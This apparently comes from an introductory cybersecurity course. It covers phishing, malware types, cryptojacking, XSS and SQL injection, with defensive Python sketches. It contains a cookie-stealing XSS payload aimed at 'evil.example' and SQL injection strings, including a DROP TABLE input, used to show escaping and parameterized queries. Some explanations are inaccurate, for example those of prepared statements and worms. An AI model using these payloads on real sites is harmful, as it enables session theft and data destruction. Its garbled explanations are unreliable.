● Be cautious about sharing information, especially over social media. Threat actors
often search these platforms for any information they can use to their advantage.
● Control curiosity when something seems too good to be true. This can include
wanting to click on attachments or links in emails and advertisements.
Pro tip: Implementing technologies like firewalls, multi-factor authentication (MFA), block
lists, email filtering, and others helps layer the defenses should someone make a mistake.
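The advice to double-check a sender's email address can even be partially automated. This is a toy sketch; the function name, domains, and addresses are invented for illustration, and real filters consider far more signals than the domain alone:

```python
import re

def suspicious_sender(email_address: str, trusted_domains: set[str]) -> bool:
    """Flag a sender whose address domain isn't one the recipient trusts."""
    match = re.search(r"@([\w.-]+)$", email_address)
    if match is None:
        return True  # malformed address: treat as suspicious
    # Look-alike domains (e.g. "examp1e.com" with a digit one) fail this check.
    return match.group(1).lower() not in trusted_domains
```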
Ideally, security training extends beyond employees. Educating customers about social
engineering threats is also a key to mitigating these threats. And security analysts play an
important part in promoting safe practices. For example, a big part of an analyst's job is
testing systems and documenting best practices for others at an organization to follow.
Key takeaways
People’s willingness to help one another and their trusting nature is what makes social
engineering such an appealing tactic for criminals. It just takes one act of kindness or a
momentary lapse in judgment for an attack to work. Criminals go to great lengths to make
their attacks difficult to detect. They rely on a variety of manipulation techniques to trick
their targets into granting them access. For that reason, implementing effective controls
and recognizing the signs of an attack go a long way towards preventing threats.
Resources for more information
Here are two additional resources to review that will help you continue developing your
understanding of social engineering trends and security practices:
● OUCH! is a free monthly newsletter from the SANS Institute that reports on social
engineering trends and other security topics.
● Scamwatch is a resource for news and tools for recognizing, avoiding, and reporting
social engineering scams.
Phishing for information
Cybercriminals prefer attacks that do the most damage with the least effort.
One of the most popular forms of social engineering that meets this description is phishing.
Phishing is the use of digital communications to trick people into revealing sensitive data or
deploying malicious software. Phishing leverages many communication technologies, but the term
is mainly used to describe attacks that arrive by email. Phishing attacks don't just affect individuals.
They are also harmful to organizations. A single employee that falls for one of these tricks can give
malicious attackers access to systems. Once inside, attackers can exploit sensitive data like
customer names and product secrets. Attackers who carry out these attacks commonly use phishing
kits. A phishing kit is a collection of software tools needed to launch a phishing campaign. People
with little technical background can use one of these kits. Each of the tools inside is designed to
avoid detection. As a security professional, you should be aware of the three main tools inside a
phishing kit, so that you can quickly identify when they're being used and put a stop to it. The first
is malicious attachments. These are files that are infected and can cause harm to the organization's
systems. Phishing kits also include fake-data collection forms. These forms look like legitimate
forms, like a survey. Unlike a real survey, they ask for sensitive information that isn't normally
asked for in an email. The third resource they include are fraudulent web links. These open to
malicious web pages that are designed to look like trusted brands. Unlike actual websites, these
fraudulent sites are built to steal information, like login credentials. Cybercriminals can use these
tools to launch a phishing attack in many forms. The most common is through malicious emails.
However, they can use them in
other forms of communication too. Most recently, cybercriminals are using smishing and vishing to
trick people into revealing private information. Smishing is the use of text messages
to obtain sensitive information or to impersonate a known source. You've probably received these
types of messages before. Not only are smishing messages annoying to receive, they're also difficult
to prevent. That's why some attackers send them. Some smishing messages are easy to detect. They
might show signs of being malicious like promising a cash reward for clicking an attached link that
shouldn't be clicked. Other times, smishing is hard to spot. Attackers sometimes use local area
codes to appear legitimate. Some hackers can even send
messages disguised as friends and families of their target to fool them into disclosing sensitive
information. Vishing is the exploitation of electronic voice communication to obtain sensitive
information or impersonate a known source. During vishing attacks, criminals pretend to be
someone they're not. For example, attackers might call pretending to be a company representative.
They might claim that there's a problem with your account. And they can offer to fix it if you
provide them with sensitive information. Most organizations use a few basic security measures to
prevent these and any other types of phishing attacks from becoming a problem. For example, anti-phishing policies spread awareness and encourage users to follow data
security procedures correctly. Employee training resources also help inform employees about
things to look for when an email looks suspicious. Another line of defense against phishing is
securing email inboxes. Email filters are commonly used to keep harmful messages from reaching
users. For example, specific email addresses can be blocked using a blocklist. Organizations often
use other filters, like allow lists, to specify IP addresses that are approved to send mail within the
company. Organizations also use intrusion prevention systems to look for unusual patterns in email
traffic. Security analysts use monitoring tools like this to spot suspicious emails, quarantine them,
and produce a log of events. Phishing campaigns are popular and dangerous forms of social
engineering that organizations of all sizes need to deal with. Just a single compromised password
that an attacker can get their hands on can lead to a costly data breach.
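The blocklist and allowlist behavior described above can be sketched as a small routing function. The sender addresses and IP addresses below are invented placeholders, and a real mail filter is far more involved (reputation scores, content scanning, SPF/DKIM checks, and so on):

```python
# Hypothetical filter lists for illustration only.
BLOCKLIST = {"prizes@win-now.example"}   # known-bad sender addresses
APPROVED_RELAYS = {"203.0.113.10"}       # IPs approved to send internal mail

def filter_message(sender: str, sender_ip: str, claims_internal: bool) -> str:
    """Return 'block', 'quarantine', or 'deliver' for an incoming message."""
    if sender.lower() in BLOCKLIST:
        return "block"                   # blocklisted address: reject outright
    if claims_internal and sender_ip not in APPROVED_RELAYS:
        return "quarantine"              # internal mail must come from an approved relay
    return "deliver"
```

Quarantined messages would then be logged and reviewed by analysts, matching the monitoring workflow described above.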
Types of phishing
Phishing is one of the most common types of social engineering, which are manipulation techniques that
exploit human error to gain private information, access, or valuables. Previously, you learned how
phishing is the use of digital communications to trick people into revealing sensitive data or deploying
malicious software.
Sometimes, phishing attacks appear to come from a trusted person or business. This can lead
unsuspecting recipients into acting against their better judgment, causing them to break security
procedures. In this reading, you’ll learn about common phishing tactics used by attackers today.
The origins of phishing
Phishing has been around since the early days of the internet. It can be traced back to the 1990s. At the
time, people across the world were coming online for the first time. As the internet became more
accessible it began to attract the attention of malicious actors. These malicious actors realized that the
internet gave them a level of anonymity to commit their crimes.
Early persuasion tactics
One of the earliest instances of phishing was aimed at a popular chat service called AOL Instant
Messenger (AIM). Users of the service began receiving emails asking them to verify their accounts or
provide personal billing information. The users were unaware that these messages were sent by
malicious actors pretending to be service providers.
This was one of the first examples of mass phishing, which describes attacks that send malicious emails
out to a large number of people, increasing the likelihood of baiting someone into the trap.
During the AIM attacks, malicious actors carefully crafted emails that appeared to come directly from
AOL. The messages used official logos, colors, and fonts to trick unsuspecting users into sharing their
information and account details.
Attackers used the stolen information to create fraudulent AOL accounts they could use to carry out
other crimes anonymously. AOL was forced to adapt their security policies to address these threats. The
chat service began including messages on their platforms to warn users about phishing attacks.
How phishing has evolved
Phishing continued evolving at the turn of the century as businesses and newer technologies began
entering the digital landscape. In the early 2000s, e-commerce and online payment systems started to
become popular alternatives to traditional marketplaces. The introduction of online transactions
presented new opportunities for attackers to commit crimes.
A number of techniques began to appear around this time period, many of which are still used today.
There are five common types of phishing that every security analyst should know:
● Email phishing is a type of attack sent via email in which threat actors send messages pretending
to be a trusted person or entity.
● Smishing is a type of phishing that uses Short Message Service (SMS), a technology that powers
text messaging. Smishing covers all forms of text messaging services, including Apple’s
iMessages, WhatsApp, and other chat mediums on phones.
● Vishing refers to the use of voice calls or voice messages to trick targets into providing personal
information over the phone.
● Spear phishing is a subset of email phishing in which specific people are purposefully targeted,
such as the accountants of a small business.
● Whaling refers to a category of spear phishing attempts that are aimed at high-ranking
executives in an organization.
Since the early days of phishing, email attacks remain the most common types that are used. While they
were originally used to trick people into sharing access credentials and credit card information, email
phishing became a popular method to infect computer systems and networks with malicious software.
In late 2003, attackers around the world created fraudulent websites that resembled businesses like
eBay and PayPal™. Mass phishing campaigns to distribute malicious programs were also launched
against e-commerce and banking sites.
Recent trends
Starting in the 2010s, attackers began to shift away from mass phishing attempts that relied on baiting
unsuspecting people into a trap. Leveraging new technologies, criminals began carrying out what’s
known as targeted phishing attempts. Targeted phishing describes attacks that are sent to specific
targets using highly customized methods to create a strong sense of familiarity.
A type of targeted phishing that evolved in the 2010s is angler phishing. Angler phishing is a technique
where attackers impersonate customer service representatives on social media. This tactic evolved from
people’s tendency to complain about businesses online. Threat actors intercept complaints from places
like message boards or comment sections and contact the angry customer via social media. Like the AIM
attacks of the 1990s, they use fraudulent accounts that appear similar to those of actual businesses.
They then trick the angry customers into sharing sensitive information with the promise of fixing their
problem.
Key takeaways
Phishing tactics have become very sophisticated over the years. Unfortunately, there isn't a perfect
solution that prevents these attacks from happening. Tactics, like email phishing that started in the last
century, remain an effective and profitable method of attack for criminals online today.
There isn’t a technological solution to prevent phishing entirely. However, there are many ways to
reduce the damage from these attacks when they happen. One way is to spread awareness and inform
others. As a security professional, you may be responsible for helping others identify forms of social
engineering, like phishing. For example, you might create training programs that educate employees
about topics like phishing. Sharing your knowledge with others is an important responsibility that helps
build a culture of security.
Resources for more information
Staying up-to-date on phishing threats is one of the best things you can do to educate yourself and help
your organization make smarter security decisions.
● Google’s phishing quiz is a tool that you can use or share that illustrates just how difficult it can
be to identify these attacks.
● Phishing.org reports on the latest phishing trends and shares free resources that can help
reduce phishing attacks.
● The Anti-Phishing Working Group (APWG) is a non-profit group of multidisciplinary security
experts that publishes a quarterly report on phishing trends.
Malicious Software
People and computers are very different from one another. There's one way that we're alike. You
know how? We're both vulnerable to getting an infection. While humans can be
infected by a virus that causes a cold or flu, computers can be infected by malware. Malware is
software designed to harm devices or networks. Malware, which is short for malicious software,
can be spread in many ways. For example, it can be spread through an infected USB drive. It's also
commonly spread between computers online. Devices and systems that are connected to the
internet are especially vulnerable to infection. When a device becomes infected, malware interferes
with its normal operations. Attackers use malware to take control of the infected system without
the user's knowledge or permission. Malware has been a threat to people and organizations for a
long time. Attackers have created many different strains of malware. They all vary in how they're
spread. Five of the most common types of malware are a virus, worm, trojan, ransomware, and
spyware. Let's take a look at how each of them work. A virus is malicious code written to interfere
with computer operations and cause damage to data and software. Viruses typically hide inside of
trusted applications. When the infected program is launched, the virus clones itself and spreads to
other files on the device. An important characteristic of viruses is that they must be activated by the
user to start the infection. The next kind of malware doesn't have this limitation. A worm is
malware that can duplicate and spread itself across systems on its own. While viruses require users
to perform an action like opening a file to duplicate, worms use an infected device as a host. They
scan the connected network for other devices. Worms then infect everything on the network
without requiring an action to trigger the spread. Viruses and worms are delivered through
phishing emails and other methods before they infect a device. Making sure you click links only
from trusted sources is one way to avoid these types of infection. However, attackers have designed
another form of malware that can get past this precaution. A trojan, or Trojan horse, is malware
that looks like a legitimate file or program. The name is a reference to an ancient Greek legend
that's set in the city of Troy. In Troy, a group of soldiers hid inside a giant wooden horse that was
presented as a gift to their enemies. It was accepted and brought inside the city walls. Later that
evening, the soldiers inside of the horse climbed out and attacked the city. Like this ancient tale,
attackers design trojans to appear harmless. This type of malware is typically disguised as files or
useful applications to trick their target into installing them. Attackers often use trojans to gain
access and install another kind of malware called ransomware. Ransomware is a type of malicious
attack where attackers encrypt an organization's data and demand payment to restore access.
These kinds of attacks have become very common. A unique feature of ransomware
These kind of attacks have become very common these days. A unique feature of ransomware
attacks is that they make themselves known to their targets. Without doing this, they couldn't
collect the money they demand. Normally, they decrypt the hidden data as soon as the sum
of money is paid. Unfortunately, there's no guarantee they won't return to demand more. The last
type of malware I want to mention is spyware. Spyware is malware that's used to gather and sell
information without consent. Consent is a keyword in this case. Organizations also collect
information about their customers, like their browsing habits and purchase history. However, they
always give their customers the ability to opt out. Cybercriminals, on the other hand, use spyware
to steal information. They use spyware attacks to collect data like login credentials, account PINs,
and other types of sensitive information for their own personal gain. There are many other types of
malware besides these, and new forms are always evolving. They all pose a serious risk to
individuals and organizations. Next time, we'll explore how security teams detect and remove these
kinds of threats.
An introduction to malware
Previously, you learned that malware is software designed to harm devices or networks. Since its first
appearance on personal computers decades ago, malware has developed into a variety of strains. Being
able to identify different types of malware and understand the ways in which they are spread will help
you stay alert and be informed as a security professional.
Virus
A virus is malicious code written to interfere with computer operations and cause damage to data and
software. This type of malware must be installed by the target user before it can spread itself and cause
damage. One of the many ways that viruses are spread is through phishing campaigns where
malicious code is hidden within links or attachments.
Worm
A worm is malware that can duplicate and spread itself across systems on its own. Similar to a virus, a
worm must be installed by the target user and can also be spread with tactics like malicious email. Given
a worm's ability to spread on its own, attackers sometimes target devices, drives, or files that have
shared access over a network.
A well-known example is the Blaster worm, also known as Lovesan, Lovsan, or MSBlast. In the early
2000s, this worm spread itself on computers running Windows XP and Windows 2000 operating
systems. It would force devices into a continuous loop of shutting down and restarting. Although it did
not damage the infected devices, it was able to spread itself to hundreds of thousands of users around
the world. Many variants of the Blaster worm have been deployed since the original and can infect
modern computers.
Note: Worms were very popular attacks in the mid-2000s but are less frequently used in recent years.
Trojan
A trojan, also called a Trojan horse, is malware that looks like a legitimate file or program. This
characteristic relates to how trojans are spread. Similar to viruses, attackers deliver this type of malware
hidden in file and application downloads. Attackers rely on tricking unsuspecting users into believing
they’re downloading a harmless file, when they’re actually infecting their own device with malware that
can be used to spy on them, grant access to other devices, and more.
Adware
Advertising-supported software, or adware, is a type of legitimate software that is sometimes used to
display digital advertisements in applications. Software developers often use adware as a way to lower
their production costs or to make their products free to the public—also known as freeware or
shareware. In these instances, developers monetize their product through ad revenue rather than at the
expense of their users.
Malicious adware falls into a sub-category of malware known as a potentially unwanted application
(PUA). A PUA is a type of unwanted software that is bundled in with legitimate programs which might
display ads, cause device slowdown, or install other software. Attackers sometimes hide this type of
malware in freeware with insecure design to monetize ads for themselves instead of the developer. This
works even when the user has declined to receive ads.
Spyware
Spyware is malware that's used to gather and sell information without consent. It's also considered a
PUA. Spyware is commonly hidden in bundleware, additional software that is sometimes packaged with
other applications. PUAs like spyware have become a serious challenge in the open-source software
development ecosystem. That’s because developers tend to overlook how their software could be
misused or abused by others.
Scareware
Another type of PUA is scareware. This type of malware employs tactics to frighten users into infecting
their own device. Scareware tricks users by displaying fake warnings that appear to come from
legitimate companies. Email and pop-ups are just a couple of ways scareware is spread. Both can be
used to deliver phony warnings with false claims about the user's files or data being at risk.
Fileless malware
Fileless malware does not need to be installed by the user because it uses legitimate programs that are
already installed to infect a computer. This type of infection resides in memory where the malware
never touches the hard drive. This is unlike the other types of malware, which are stored within a file on
disk. Instead, these stealthy infections get into the operating system or hide within trusted applications.
Pro tip: Fileless malware is detected by performing memory analysis, which requires experience with
operating systems.
Rootkits
A rootkit is malware that provides remote, administrative access to a computer. Most attackers use
rootkits to open a backdoor to systems, allowing them to install other forms of malware or to conduct
network security attacks.
This kind of malware is often spread by a combination of two components: a dropper and a loader. A
dropper is a type of malware that comes packed with malicious code which is delivered and installed
onto a target system. For example, a dropper is often disguised as a legitimate file, such as a document,
an image, or an executable to deceive its target into opening, or dropping it, onto their device. If the user
opens the dropper program, its malicious code is executed and it hides itself on the target system.
Multi-staged malware attacks, where multiple packets of malicious code are deployed, commonly use a
variation called a loader. A loader is a type of malware that downloads strains of malicious code from an
external source and installs them onto a target system. Attackers might use loaders for different
purposes, such as to set up another type of malware: a botnet.
Botnet
A botnet, short for “robot network,” is a collection of computers infected by malware that are under the
control of a single threat actor, known as the “bot-herder.” Viruses, worms, and trojans are often used to
spread the initial infection and turn the devices into a bot for the bot-herder. The attacker then uses file
sharing, email, or social media application protocols to create new bots and grow the botnet. When a
target unknowingly opens the malicious file, the computer, or bot, reports the information back to the
bot-herder, who can execute commands on the infected computer.
Ransomware
Ransomware describes a malicious attack where threat actors encrypt an organization's data and
demand payment to restore access. According to the Cybersecurity and Infrastructure Security Agency
(CISA), ransomware crimes are on the rise and becoming increasingly sophisticated. Ransomware
infections can cause significant damage to an organization and its customers. An example is the
WannaCry attack, which encrypts a victim's computer until a ransom is paid in cryptocurrency.
Key takeaways
The variety of malware is astounding. The number of ways that it’s spread is even more staggering.
Malware is a complex threat that can require its own specialization in cybersecurity. One place to learn
more about malware analysis is INFOSEC's introductory course on malware analysis. Even without
specializing in malware analysis, recognizing the types of malware and how they’re spread is an
important part of defending against these attacks as a security analyst.
The Rise of Cryptojacking
Malware has been around nearly as long as computers. In its earliest forms, it was used by
troublemakers as a form of digital vandalism. In today's digital world, malware has become
a profitable crime that attackers use for
their own financial gain. As a security professional, it's important that you remain aware of the
latest evolutions. Let's take a closer look at
one way malware has evolved. We'll then use this example to consider how malware can be spotted
and how you can proactively protect
against malware. Ransomware is one of the types of malware attackers use to steal money. Another
more recent type of malware is cryptojacking. Cryptojacking is a form
of malware that installs software to illegally mine cryptocurrencies. You may be familiar with
cryptocurrency from the news. If you're new to the topic, cryptocurrencies are a form
of digital money that have real-world value. Like physical forms of currency, there are many
different types. For the most part, they're referred to as coins or tokens. In simple terms, crypto
mining is a process used to obtain new coins. Crypto mining is similar to the process for mining for
other resources, like gold. Mining for something like gold involves machinery, such as trucks and
bulldozers, that can dig through the Earth. Crypto coins, on the other hand, use computers instead.
Rather than digging through the Earth, the computers run software that digs through billions of lines
of encrypted code. When enough code is processed, a crypto coin can be found. Generally, more
computers mining for coins mean more cryptocurrency can be discovered. Criminals unfortunately
figured this out. Beginning in 2017, cryptojacking malware started being used to gain unauthorized
control of personal computers to mine cryptocurrency. Since that time, cryptojacking techniques
have become more sophisticated. Criminals now regularly target vulnerable servers to spread their
mining software. Devices that communicate with the infected server become infected themselves.
The malicious code then runs in the background, mining for coins unknown to anyone.
Cryptojacking software is hard to detect. Luckily, security professionals have sophisticated tools
that can help. An intrusion detection system, or IDS, is an application that monitors system activity
and alerts on possible intrusions. When abnormal activity is detected, like malware mining for
coins, the IDS alerts security personnel. Despite their usefulness, detection systems have a major
drawback. New forms of malware can remain undetected. Fortunately, there are subtle signs that
indicate a device is infected with cryptojacking software or other forms of malware. By far the most
telling sign of a cryptojacking infection is slowdown. Other signs include increased CPU usage,
sudden system crashes, and fast-draining batteries. Another sign is unusually high electricity costs
related to the resource-intensive process of crypto mining. It's also good to know that there are
certain measures you can take to reduce the likelihood of experiencing a malware attack like
cryptojacking. These defenses include things like using browser extensions designed to block
malware, using ad blockers, disabling JavaScript, and staying alert to the latest trends. Security
analysts can also educate others in their organizations on malware attacks. While cryptojacking is still relatively
new, attacks are becoming more common. The type of malicious code cybercriminals spread is
continually evolving. It takes many years of experience to analyze new forms of malware.
Nevertheless, you're well on your way towards helping defend against these threats.
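The warning signs mentioned above, such as sustained high CPU usage, can be turned into a simple detection heuristic. The sketch below is a hypothetical illustration in Python, not a real detector: it only evaluates CPU readings it's given, whereas a real monitor would also collect those samples (for example, with a system metrics library).

```python
# Hypothetical heuristic: flag sustained high CPU usage, one of the
# telltale signs of cryptojacking described in this section.
def flag_sustained_cpu(readings, threshold=90.0, min_consecutive=5):
    """Return True if CPU usage stays at or above `threshold` percent
    for at least `min_consecutive` consecutive samples."""
    streak = 0
    for pct in readings:
        streak = streak + 1 if pct >= threshold else 0
        if streak >= min_consecutive:
            return True
    return False

# Normal workload: brief spikes, nothing sustained -- no alert.
print(flag_sustained_cpu([12, 95, 30, 97, 20, 15]))      # False
# Suspicious: CPU pinned near 100% for many samples -- alert.
print(flag_sustained_cpu([96, 98, 99, 97, 95, 99, 98]))  # True
```

A real IDS applies far more sophisticated logic, but the principle is the same: abnormal, sustained resource usage is a signal worth alerting on.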
Cross-site Scripting (XSS)
Previously, we explored a few types of malware. Whether it's installed on an individual computer or
a network server, all malicious software needs to be delivered to the target before it can work.
Phishing and other social engineering techniques are common ways for malware to be delivered.
Another way it's spread is using a broad class of threats known as web based exploits. Web-based
exploits are malicious code or behavior that's used to take advantage of coding flaws in a web
application. Cybercriminals use web-based exploits to obtain sensitive personal information.
Attacks occur because web applications interact with multiple users across multiple networks.
Malicious hackers commonly exploit this high level of interaction using injection attacks. An
injection attack is malicious code inserted into a vulnerable application. The infected application
often appears to work normally. That's because the injected code runs in the background, unknown
to the user. Applications are vulnerable to injection attacks because they are programmed to
receive data inputs. This could be something the user types, clicks, or something one program is
sharing with another. When coded correctly, applications should be able to interpret and handle
user inputs. For example, let's say an application is expecting the user to enter a phone number.
This application should validate the input from the user to make sure the data is all numbers and
not more than ten digits. If the input from the user doesn't meet these requirements, the application
should know how to handle it. Web apps interact with multiple users across many platforms. They
also have a lot of interactive objects like images and buttons. This makes it challenging for
developers to think of all the ways they should sanitize their input. A common and dangerous type
of injection attack that's a threat to web apps is cross-site scripting. Cross-site scripting, or XSS, is an
injection attack that inserts code into a vulnerable website or web application. These attacks are
often delivered by exploiting the two languages used by most websites, HTML and JavaScript. Both
can give cybercriminals access to everything that loads on the infected web page. This can include
session cookies, geolocation, and even webcams and microphones. There are three main types of
cross-site scripting attacks: reflected, stored, and DOM-based. A reflected XSS attack is an instance
where a malicious script is sent to the server and activated during the server's response. A common
example of this is the search bar of a website. In a reflected XSS attack, criminals send their target a
web link that appears to go to a trusted site. When they click the link, it sends an HTTP request to the
vulnerable site server. The attacker script is then returned or reflected back to the innocent user's
browser. Here, the browser loads the malicious script because it trusts the server's response. With
the script loaded, information like session cookies is sent back to the attacker. In a stored XSS
attack, the malicious script isn't hidden in a link that needs to be sent to the server. Instead, a stored
XSS attack is an instance when malicious script is injected directly on the server. Here, attackers
target elements of a site that are served to the user. This could be things like images and buttons
that load when the site is visited. Infected elements activate the malicious code when a user simply
visits the site. Stored XSS attacks can be damaging because the user has no way of knowing the site
is infected beforehand. Finally, there's DOM-based XSS. DOM stands for Document Object Model,
which is basically the source code of a website. A DOM-based XSS attack is an instance when
malicious script exists in the web page a browser loads. Unlike reflected XSS, these attacks don't
need to be sent to the server to activate. In a DOM-based attack, a malicious script can be seen in the
URL. In this example, the website's URL contains parameter values. The parameter values reflect
input from the user. Here, the site allows users to select color themes. When the user makes a
selection, it appears as part of the URL. In a DOM-based attack, criminals change the parameter
that's expecting an input. For example, they could hide malicious JavaScript in the HTML tags. The
browser would process the HTML and execute the JavaScript. Hackers use these methods of cross-site scripting to steal sensitive information. Security analysts should be familiar with this group of
injection attacks.
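A common defense against all three types of XSS is escaping user-supplied text before it's placed into a page, so any injected HTML or JavaScript is displayed as plain text instead of being executed. Here's a minimal sketch using Python's standard library; the comment value and page template are hypothetical:

```python
import html

# Hypothetical comment an attacker might submit to a vulnerable page.
malicious = '<script>document.location="https://evil.example/?c="+document.cookie</script>'

# Escaping converts special characters (<, >, &, quotes) into HTML
# entities, so the browser displays the text instead of executing it.
safe = html.escape(malicious)

# Hypothetical page template rendering the escaped comment.
page = f"<p>Latest comment: {safe}</p>"
print(page)
```

After escaping, the `<script>` tag arrives in the browser as `&lt;script&gt;`, which renders as visible text rather than running as code.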
Exploitable gaps in databases
Let's keep exploring injection attacks by investigating another common type of web-based
exploit. The next one we're going to discuss exploits the way websites access information from
databases. Early in the program, you may have learned about SQL. You may recall, SQL is a
programming language used to create, interact with, and request information from a database. SQL
is used by most web applications. For example, shopping websites use it a lot. Imagine the
database of an online clothing store. It likely contains a full inventory of all the items the company
sells. Websites don't normally make users enter the SQL queries manually. Instead, they use things
like menus, images, and buttons to show users information in a meaningful way. For example, when
an online shopper clicks a button to add a sweater to their cart, it triggers a SQL query. The query
runs in the background where no one can see it. You'd never know from using the menus and
buttons of a website, but sometimes those backend queries are vulnerable to injection attacks. A SQL
injection is an attack that executes unexpected queries on a database. Like cross-site scripting, SQL
injection occurs due to a lack of sanitized input. The injections take place in the areas of the website
that are designed to accept user input. A common example
is the login form to access a site. One of these forms might trigger a backend SQL statement like this
when a user enters their credentials. Web forms, like this one, are designed to copy user input into
the statement exactly as it's written. The statement then sends a request to the server, which
runs the query. Websites that are vulnerable to SQL injection insert the user's input exactly as it's
entered before running the code. Unfortunately, this is a serious design flaw. It commonly happens
because web developers expect people to use these inputs correctly. They don't anticipate attackers
exploiting them. For example, an attacker might insert additional SQL code. This could cause the
server to run a harmful query of code that it wasn't expecting. Malicious hackers can target these
attack vectors to obtain sensitive information, modify tables and even gain administrative rights to
the database. The best way to defend against SQL
injection is code that will sanitize the input. Developers can write code to search for specific SQL
characters. This gives the server a clearer idea of what inputs to expect. One way this is done is with
prepared statements. A prepared statement is a coding technique that executes SQL statements
before passing them on to the database. When the user's input is unknown, the best practice is to
use these prepared statements. With just a few extra lines of code, a prepared statement executes
the code before passing it on to the server. This means the code can be validated before performing
the query. Having well written code is one of
the keys to preventing SQL injection. Security teams work with program developers to test
applications for these sorts of vulnerabilities. Like a lot of security tasks, it's a team effort. Injection
attacks are just one of many types of web-based exploits that security teams deal with. We're going
to explore how security teams prepare for injection attacks and other kinds of threats.
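The login-form flaw and the prepared-statement fix described above can be demonstrated with Python's built-in sqlite3 module. The table and credentials here are hypothetical; the point is the contrast between copying user input into the query string and binding it as a parameter:

```python
import sqlite3

# Hypothetical users table for the login-form example above.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

# A classic injection payload: the trailing -- comments out the rest
# of the statement, removing the password check entirely.
evil_input = "alice' --"

# VULNERABLE: the input is copied into the statement exactly as
# written, so the payload becomes part of the SQL code.
unsafe_sql = (
    f"SELECT * FROM users "
    f"WHERE username = '{evil_input}' AND password = 'wrong'"
)
rows_unsafe = conn.execute(unsafe_sql).fetchall()
print(rows_unsafe)  # [('alice', 's3cret')] -- logged in without the password

# SAFER: a parameterized (prepared) statement binds the input as data,
# so the payload is treated as a literal username, not as SQL code.
safe_sql = "SELECT * FROM users WHERE username = ? AND password = ?"
rows_safe = conn.execute(safe_sql, (evil_input, "wrong")).fetchall()
print(rows_safe)    # [] -- no match, the attack fails
```

The `?` placeholders let the database driver handle the attacker's payload as plain data, which is exactly the validation-before-query behavior described above.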
Prevent injection attacks
Previously, you learned that Structured Query Language (SQL) is a programming language used to
create, interact with, and request information from a database. SQL is one of the most common
programming languages used to interact with databases because it is widely supported by a range of
database products.
As you might recall, malicious SQL injection is a type of attack that executes unexpected queries on a
database. Threat actors perform SQL injections to modify, delete, or steal information from databases. A
SQL injection is a common attack vector that is used to gain unauthorized access to web applications.
Due to the language's popularity with developers, SQL injections are regularly listed in the OWASP®
Top 10 because developers tend to focus on making their applications work correctly rather than
protecting their products from injection.
In this reading, you'll learn about SQL queries and how they are used to request information from a
database. You will also learn about the three classes of SQL injection attacks used to manipulate
vulnerable queries, ways to identify when websites are vulnerable, and ways to address those gaps.
SQL queries
Every bit of information that’s accessed online is stored in a database. A database is an organized
collection of information or data in one place. A database can include data such as an organization's
employee directory or customer payment methods. In SQL, database information is organized in tables.
SQL is commonly used for retrieving, inserting, updating, or deleting information in tables using queries.
A SQL query is a request for data from a database. For example, a SQL query can request data from an
organization's employee directory such as employee IDs, names, and job titles. A human resources
application can accept an input that queries a SQL table to filter the data and locate a specific person.
SQL injections can occur anywhere within a vulnerable application that can accept a SQL query.
Queries are usually initiated in places where users can input information into an application or a
website via an input field. Input fields include features that accept text input such as login forms, search
bars, or comment submission boxes. A SQL injection occurs when an attacker exploits input fields that
aren't programmed to filter out unwanted text. SQL injections can be used to manipulate databases, steal
sensitive data, or even take control of vulnerable applications.
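To make the idea of a query concrete, here is a small, hypothetical version of the employee-directory example above, using Python's built-in sqlite3 module to run the SQL:

```python
import sqlite3

# Hypothetical employee directory table from the example above.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE employees (id INTEGER, name TEXT, title TEXT)")
conn.executemany("INSERT INTO employees VALUES (?, ?, ?)", [
    (1, "Ana", "Security Analyst"),
    (2, "Ben", "HR Specialist"),
])

# A SQL query: a request for data from the database, here filtering
# the table to locate employees with a specific job title.
rows = conn.execute(
    "SELECT id, name, title FROM employees WHERE title = ?",
    ("Security Analyst",),
).fetchall()
print(rows)  # [(1, 'Ana', 'Security Analyst')]
```

An application would typically build a query like this from a value the user typed into an input field, which is exactly where injection risks arise.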
SQL injection categories
There are three main categories of SQL injection:
● In-band
● Out-of-band
● Inferential
In the following sections, you'll learn that each type describes how a SQL injection is initiated and how it
returns the results of the attack.
In-band SQL injection
In-band, or classic, SQL injection is the most common type. An in-band injection is one that uses the
same communication channel to launch the attack and gather the results.
For example, this might occur in the search box of a retailer's website that lets customers find products
to buy. If the search box is vulnerable to injection, an attacker could enter a malicious query that would
be executed in the database, causing it to return sensitive information like user passwords. The data
that's returned is displayed back in the search box where the attack was initiated.
Out-of-band SQL injection
An out-of-band injection is one that uses a different communication channel to launch the attack and
gather the results.
For example, an attacker could use a malicious query to create a connection between a vulnerable
website and a database they control. This separate channel would allow them to bypass any security
controls that are in place on the website's server, allowing them to steal sensitive data.
Note: Out-of-band injection attacks are very uncommon because they'll only work when certain features
are enabled on the target server.
Inferential SQL injection
Inferential SQL injection occurs when an attacker is unable to directly see the results of their attack.
Instead, they can interpret the results by analyzing the behavior of the system.
For example, an attacker might perform a SQL injection attack on the login form of a website that causes
the system to respond with an error message. Although sensitive data is not returned, the attacker can
figure out the database's structure based on the error. They can then use this information to craft
attacks that will give them access to sensitive data or to take control of the system.
Injection Prevention
SQL queries are often programmed with the assumption that users will only input relevant information.
For example, a login form that expects users to input their email address assumes the input will be
formatted a certain way, such as jdoe@domain.com. Unfortunately, this isn’t always the case.
A key to preventing SQL injection attacks is to escape user inputs—preventing someone from inserting
any code that a program isn't expecting.
There are several ways to escape user inputs:
● Prepared statements: a coding technique that executes SQL statements before passing them on to a database.
● Input sanitization: programming that removes user input which could be interpreted as code.
● Input validation: programming that ensures user input meets a system's expectations.
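Two of the techniques listed above, input sanitization and input validation, can be sketched in a few lines. The specific characters removed and the email pattern below are hypothetical examples; real applications tailor these rules to each input field:

```python
import re

# Hypothetical input-sanitization sketch: remove characters that are
# commonly interpreted as SQL syntax (quotes, semicolons, comment dashes).
def sanitize(user_input: str) -> str:
    return re.sub(r"['\";-]", "", user_input)

# Hypothetical input-validation sketch: require the value to match the
# shape the system expects (here, a simple email-address pattern).
def looks_like_email(user_input: str) -> bool:
    return re.fullmatch(r"[\w.+-]+@[\w-]+\.[\w.]+", user_input) is not None

print(sanitize("jdoe'; DROP TABLE users; --"))  # quotes, semicolons, dashes removed
print(looks_like_email("jdoe@domain.com"))      # True
print(looks_like_email("jdoe'; --"))            # False
```

Neither technique replaces prepared statements; defenses like these are layered together, which is why the reading recommends using a combination of them.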
Using a combination of these techniques can help prevent SQL injection attacks. In the security field, you
might need to work closely with application developers to address vulnerabilities that can lead to SQL
injections. OWASP's SQL injection detection techniques is a useful resource if you're interested in
